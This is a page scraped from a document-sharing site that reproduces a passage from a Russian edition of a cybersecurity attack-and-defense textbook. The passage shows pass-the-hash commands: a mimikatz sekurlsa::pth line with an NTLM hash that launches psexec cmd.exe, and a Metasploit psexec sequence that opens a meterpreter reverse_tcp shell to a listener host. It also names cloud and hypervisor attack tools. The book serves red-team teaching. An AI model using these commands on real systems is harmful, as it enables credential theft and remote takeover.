Интернетмагазин

sekurlsa::pth /user:yuri /domain:wdw7

Download 18,66 Mb.

Pdf ko'rish

bet	121/272
Sana	25.02.2022
Hajmi	18,66 Mb.
	#290514

1 ... 117 118 119 120 121 122 123 124 ... 272

Bog'liq
Диогенес Ю., Озкайя Э. - Кибербезопасность. Стратегии атак и обороны - 2020

sekurlsa::pth /user:yuri /domain:wdw7
/ntlm:4dbe35c3378750321e3f61945fa8c92a /run:".psexec \yuri -h cmd.exe"
Командная строка откроется в контексте этого конкретного пользователя.
Если у этого пользователя есть права администратора, игра окончена. Атаку
также можно осуществить из Metasploit на компьютере под управлением Kali.
Последовательность команд показана следующим образом:
> use exploit/windows/smb/psexec
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.1.99
> set LPORT 4445
> set RHOST 192.168.1.15
> set SMBUser Yuri
> set SMBPass 4dbe35c3378750321e3f61945fa8c92a
Как только эти шаги будут выполнены, выполните команду exploit и посмот-
рите результаты (рис. 6.22).
Рис. 6.22

Резюме 

139
Поскольку это всего лишь упражнение для Красной команды, его цель – до-
казать, что система уязвима для атак такого типа. Обратите внимание, что
мы не взламывали данные, а только показали, насколько уязвима вся защита
идентификационных данных.
Другие способы взлома реквизитов доступа
Хотя можно с уверенностью сказать, что большой ущерб можно нанести с по-
мощью трех упомянутых ранее подходов, также можно утверждать, что су-
ществует еще больше способов взлома реквизитов доступа.
Красная команда может использовать облачную инфраструктуру в качестве
цели для атаки. Утилита Nimbostratus от Андреса Рианчо – отличный ресурс
для проведения атаки на инфраструктуру Amazon Cloud.
Будучи членом Красной команды, вы также можете столкнуться с необхо-
димостью осуществить атаки на гипервизор (VMWare или Hyper-V). Для этого
типа атаки вы можете воспользоваться PowerMemory (
https://github.com/giMini/
PowerMemory/).

Download 18,66 Mb.

Do'stlaringiz bilan baham:

1 ... 117 118 119 120 121 122 123 124 ... 272